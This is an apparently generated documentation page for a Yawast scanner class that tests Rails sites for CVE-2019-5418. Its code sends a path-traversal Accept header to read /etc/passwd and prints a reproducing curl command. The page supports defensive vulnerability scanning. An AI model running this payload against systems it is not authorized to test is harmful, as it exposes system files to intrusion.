Class: Yawast::Scanner::Plugins::Applications::Framework::Rails

Inherits:
Object
  • Object
show all
Defined in:
lib/scanner/plugins/applications/framework/rails.rb

Class Method Summary collapse

Class Method Details

.check_all(uri, links) ⇒ Object 



9
10
11
 
# File 'lib/scanner/plugins/applications/framework/rails.rb', line 9

def self.check_all(uri, links)
  check_cve_2019_5418 links
end

.check_cve_2019_5418(links) ⇒ Object 



13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 
# File 'lib/scanner/plugins/applications/framework/rails.rb', line 13

def self.check_cve_2019_5418(links)
  Yawast::Shared::Output.log_hash 'vulnerabilities',
                                  'rails_cve_2019_5418',
                                  {vulnerable: false, body: nil}

  links.each do |link|
    # this only applies to controllers, so skip the check unless the link ends with '/'
    next unless link.to_s.end_with? '/'

    body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
    if body.include? 'root:'
      Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
      Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"

      Yawast::Shared::Output.log_hash 'vulnerabilities',
                                      'rails_cve_2019_5418',
                                      {vulnerable: true, body: body, uri: link}
      break
    end
  end
end